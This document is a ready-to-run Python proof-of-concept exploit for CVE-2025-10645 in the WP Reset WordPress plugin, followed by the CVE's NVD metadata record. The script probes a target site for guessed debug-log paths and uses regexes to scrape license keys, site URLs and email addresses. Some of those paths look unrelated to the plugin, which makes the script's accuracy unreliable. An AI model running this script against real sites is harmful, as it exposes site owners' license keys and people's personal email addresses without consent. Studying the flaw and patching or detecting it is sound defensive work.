CVE-2025-10645

# CVE-2025-10645 PoC - WP Reset Plugin Sensitive Information Exposure # Exploits the WF_Licensing::log() method that writes sensitive data to debug logs import requests import re import sys from urllib.parse import urljoin def exploit(target_url): """ Exploit CVE-2025-10645: Extract sensitive license key and site data from WP Reset plugin debug logs. """ # Common debug log file paths used by WP Reset plugin log_paths = [ '/wp-content/uploads/wp-reset/debug.log', '/wp-content/debug.log', '/wp-content/plugins/wp-reset/debug.log', '/wp-content/uploads/wordpress-popup/log/debug.log', ] session = requests.Session() session.headers.update({ 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-10645-PoC)', }) found_data = {} for log_path in log_paths: log_url = urljoin(target_url, log_path) try: resp = session.get(log_url, timeout=10) if resp.status_code == 200 and len(resp.text) > 0: print(f"[+] Found log file at: {log_url}") # Extract license keys (typical patterns) license_patterns = [ r'license[_-]?key["\s:=]+([A-Za-z0-9\-_]{20,})', r'license["\s:=]+"([^"]+)"', r'activation[_-]?key["\s:=]+([A-Za-z0-9\-_]{20,})', r'key["\s:=]+"([A-Za-z0-9\-_]{32,})"', ] for pattern in license_patterns: matches = re.findall(pattern, resp.text, re.IGNORECASE) if matches: found_data['license_keys'] = matches print(f"[+] Extracted license keys: {matches}") # Extract site URLs site_urls = re.findall(r'https?://[\w\-\.]+\.[a-z]{2,}[/\w\-\.]*', resp.text) if site_urls: found_data['site_urls'] = list(set(site_urls)) print(f"[+] Extracted site URLs: {found_data['site_urls']}") # Extract email addresses emails = re.findall(r'[\w\.+-]+@[\w\-]+\.[\w\-\.]+', resp.text) if emails: found_data['emails'] = list(set(emails)) print(f"[+] Extracted emails: {found_data['emails']}") break except requests.RequestException as e: continue return found_data if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_wordpress_url>") print(f"Example: {sys.argv[0]} https://example.com") sys.exit(1) target = sys.argv[1] data = exploit(target) if data: print(f"\n[!] Sensitive data extracted successfully:") for key, value in data.items(): print(f" {key}: {value}") else: print("[-] No sensitive data found or target not vulnerable.")

{"cve": {"id": "CVE-2025-10645", "sourceIdentifier": "[email protected]", "published": "2025-10-07T09:15:32.610", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Reset plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.05 via the WF_Licensing::log() method when debugging is enabled (default). This makes it possible for unauthenticated attackers to extract sensitive license key and site data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3364169/", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-10645/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/86741f4a-8700-45dd-8998-b3f0387c27ed?source=cve", "source": "[email protected]"}]}}